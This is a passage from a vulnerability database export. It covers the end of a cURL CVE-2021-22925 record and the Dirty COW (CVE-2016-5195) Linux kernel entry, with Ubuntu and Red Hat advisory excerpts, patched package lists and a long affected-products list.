      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-381399"
      },
      {
        "db": "PACKETSTORM",
        "id": "165286"
      },
      {
        "db": "PACKETSTORM",
        "id": "165287"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "166489"
      },
      {
        "db": "PACKETSTORM",
        "id": "164249"
      },
      {
        "db": "PACKETSTORM",
        "id": "164246"
      },
      {
        "db": "PACKETSTORM",
        "id": "165129"
      },
      {
        "db": "PACKETSTORM",
        "id": "165099"
      },
      {
        "db": "PACKETSTORM",
        "id": "165862"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-009763"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22925"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-381399",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "165286",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "165287",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170303",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "166489",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "164249",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "164246",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "165129",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "165099",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "165862",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-009763",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22925",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2021-08-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-381399",
        "ident": null
      },
      {
        "date": "2021-12-15T15:20:33",
        "db": "PACKETSTORM",
        "id": "165286",
        "ident": null
      },
      {
        "date": "2021-12-15T15:20:43",
        "db": "PACKETSTORM",
        "id": "165287",
        "ident": null
      },
      {
        "date": "2022-12-19T13:48:31",
        "db": "PACKETSTORM",
        "id": "170303",
        "ident": null
      },
      {
        "date": "2022-03-28T15:52:16",
        "db": "PACKETSTORM",
        "id": "166489",
        "ident": null
      },
      {
        "date": "2021-09-22T16:35:10",
        "db": "PACKETSTORM",
        "id": "164249",
        "ident": null
      },
      {
        "date": "2021-09-22T16:33:18",
        "db": "PACKETSTORM",
        "id": "164246",
        "ident": null
      },
      {
        "date": "2021-12-02T16:06:16",
        "db": "PACKETSTORM",
        "id": "165129",
        "ident": null
      },
      {
        "date": "2021-11-30T14:44:48",
        "db": "PACKETSTORM",
        "id": "165099",
        "ident": null
      },
      {
        "date": "2022-02-04T17:26:39",
        "db": "PACKETSTORM",
        "id": "165862",
        "ident": null
      },
      {
        "date": "2022-05-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-009763",
        "ident": null
      },
      {
        "date": "2021-08-05T21:15:11.467000",
        "db": "NVD",
        "id": "CVE-2021-22925",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-01-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-381399",
        "ident": null
      },
      {
        "date": "2025-09-19T08:29:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-009763",
        "ident": null
      },
      {
        "date": "2024-03-27T15:11:42.063000",
        "db": "NVD",
        "id": "CVE-2021-22925",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "165129"
      }
    ],
    "trust": 0.1
  },
  "title": {
    "_id": null,
    "data": "cURL\u00a0 Vulnerability in using uninitialized resources in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-009763"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "code execution",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "165286"
      },
      {
        "db": "PACKETSTORM",
        "id": "165287"
      },
      {
        "db": "PACKETSTORM",
        "id": "165099"
      }
    ],
    "trust": 0.3
  }
}

VAR-201611-0386

Vulnerability from variot - Updated: 2025-12-22 23:04

Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka "Dirty COW.". Linux kernel is prone to a local privilege-escalation vulnerability. Local attackers may exploit this issue to gain elevated privileges. ========================================================================== Ubuntu Security Notice USN-3106-1 October 20, 2016

linux vulnerability

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 16.04 LTS

Summary:

The system could be made to run programs as an administrator.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04 LTS: linux-image-4.4.0-45-generic 4.4.0-45.66 linux-image-4.4.0-45-generic-lpae 4.4.0-45.66 linux-image-4.4.0-45-lowlatency 4.4.0-45.66 linux-image-4.4.0-45-powerpc-e500mc 4.4.0-45.66 linux-image-4.4.0-45-powerpc-smp 4.4.0-45.66 linux-image-4.4.0-45-powerpc64-emb 4.4.0-45.66 linux-image-4.4.0-45-powerpc64-smp 4.4.0-45.66

After a standard system update you need to reboot your computer to make all the necessary changes.

(CVE-2016-5195, Important)
A flaw was found in the Linux kernel's keyring handling code: the key_reject_and_link() function could be forced to free an arbitrary memory block. An attacker could use this flaw to trigger a use-after-free condition on the system, potentially allowing for privilege escalation. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security update Advisory ID: RHSA-2016:2105-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2105.html Issue date: 2016-10-25 CVE Names: CVE-2016-5195 =====================================================================

Summary:

An update for kernel is now available for Red Hat Enterprise Linux 6.

Relevant releases/architectures:

An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)

Red Hat would like to thank Phil Oester for reporting this issue.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

Bugs fixed (https://bugzilla.redhat.com/):

1384344 - CVE-2016-5195 kernel: mm: privilege escalation via MAP_PRIVATE COW breakage

Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: kernel-2.6.32-642.6.2.el6.src.rpm

i386: kernel-2.6.32-642.6.2.el6.i686.rpm kernel-debug-2.6.32-642.6.2.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.2.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm kernel-devel-2.6.32-642.6.2.el6.i686.rpm kernel-headers-2.6.32-642.6.2.el6.i686.rpm perf-2.6.32-642.6.2.el6.i686.rpm perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-642.6.2.el6.noarch.rpm kernel-doc-2.6.32-642.6.2.el6.noarch.rpm kernel-firmware-2.6.32-642.6.2.el6.noarch.rpm

x86_64: kernel-2.6.32-642.6.2.el6.x86_64.rpm kernel-debug-2.6.32-642.6.2.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm kernel-debug-devel-2.6.32-642.6.2.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.2.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.2.el6.x86_64.rpm kernel-devel-2.6.32-642.6.2.el6.x86_64.rpm kernel-headers-2.6.32-642.6.2.el6.x86_64.rpm perf-2.6.32-642.6.2.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm python-perf-2.6.32-642.6.2.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.2.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm python-perf-2.6.32-642.6.2.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: kernel-2.6.32-642.6.2.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-642.6.2.el6.noarch.rpm kernel-doc-2.6.32-642.6.2.el6.noarch.rpm kernel-firmware-2.6.32-642.6.2.el6.noarch.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Red Hat Enterprise Linux Server (v. 6):

Source: kernel-2.6.32-642.6.2.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-642.6.2.el6.noarch.rpm kernel-doc-2.6.32-642.6.2.el6.noarch.rpm kernel-firmware-2.6.32-642.6.2.el6.noarch.rpm

ppc64: kernel-2.6.32-642.6.2.el6.ppc64.rpm kernel-bootwrapper-2.6.32-642.6.2.el6.ppc64.rpm kernel-debug-2.6.32-642.6.2.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm kernel-debug-devel-2.6.32-642.6.2.el6.ppc64.rpm kernel-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-642.6.2.el6.ppc64.rpm kernel-devel-2.6.32-642.6.2.el6.ppc64.rpm kernel-headers-2.6.32-642.6.2.el6.ppc64.rpm perf-2.6.32-642.6.2.el6.ppc64.rpm perf-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm python-perf-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm

s390x: kernel-2.6.32-642.6.2.el6.s390x.rpm kernel-debug-2.6.32-642.6.2.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-642.6.2.el6.s390x.rpm kernel-debug-devel-2.6.32-642.6.2.el6.s390x.rpm kernel-debuginfo-2.6.32-642.6.2.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-642.6.2.el6.s390x.rpm kernel-devel-2.6.32-642.6.2.el6.s390x.rpm kernel-headers-2.6.32-642.6.2.el6.s390x.rpm kernel-kdump-2.6.32-642.6.2.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-642.6.2.el6.s390x.rpm kernel-kdump-devel-2.6.32-642.6.2.el6.s390x.rpm perf-2.6.32-642.6.2.el6.s390x.rpm perf-debuginfo-2.6.32-642.6.2.el6.s390x.rpm python-perf-debuginfo-2.6.32-642.6.2.el6.s390x.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

ppc64: kernel-debug-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm kernel-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-642.6.2.el6.ppc64.rpm perf-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm python-perf-2.6.32-642.6.2.el6.ppc64.rpm python-perf-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-642.6.2.el6.s390x.rpm kernel-debuginfo-2.6.32-642.6.2.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-642.6.2.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-642.6.2.el6.s390x.rpm perf-debuginfo-2.6.32-642.6.2.el6.s390x.rpm python-perf-2.6.32-642.6.2.el6.s390x.rpm python-perf-debuginfo-2.6.32-642.6.2.el6.s390x.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: kernel-2.6.32-642.6.2.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-642.6.2.el6.noarch.rpm kernel-doc-2.6.32-642.6.2.el6.noarch.rpm kernel-firmware-2.6.32-642.6.2.el6.noarch.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2016-5195 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/2706661

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD4DBQFYEJcBXlSAg2UNWIIRAiWLAKCCzQq/hlgGpFbZwm1VmGEtsf8qbwCYhOVp coEi7YBOAF6JIj/7g1jNNg== =enSu -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201611-0386",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.2.83"
      },
      {
        "model": "enterprise linux aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.1"
      },
      {
        "model": "ontap select deploy administration utility",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "oncommand performance manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.8"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.10.104"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.10"
      },
      {
        "model": "enterprise linux aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.4.113"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "pan-os",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.1.35"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "23"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.8.3"
      },
      {
        "model": "oncommand balance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "7.1.8"
      },
      {
        "model": "enterprise linux aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "hci storage nodes",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.7.9"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.7"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "snapprotect",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "24"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.26"
      },
      {
        "model": "enterprise linux tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.18.44"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": "enterprise linux long life",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.6"
      },
      {
        "model": "oncommand unified manager for clustered data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.38"
      },
      {
        "model": "enterprise linux long life",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.9"
      },
      {
        "model": "pan-os",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "7.0.14"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "25"
      },
      {
        "model": "pan-os",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "7.1.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.12.66"
      },
      {
        "model": "paging server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "msr95x",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.110.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.114"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.11"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.117"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.22"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.112"
      },
      {
        "model": "cloudengine v200r001sph002",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "8800"
      },
      {
        "model": "(comware r2122",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79007)"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.46"
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.89"
      },
      {
        "model": "video surveillance media server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.80"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.155"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.4"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.16"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1.131"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59507)0"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.25"
      },
      {
        "model": "ip interoperability and collaboration system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloudengine v100r005c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.80"
      },
      {
        "model": "5130ei (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.12"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.10"
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3400"
      },
      {
        "model": "enterprise linux client optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "cloudengine v100r003c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.4"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.2"
      },
      {
        "model": "cloudengine v100r002c00",
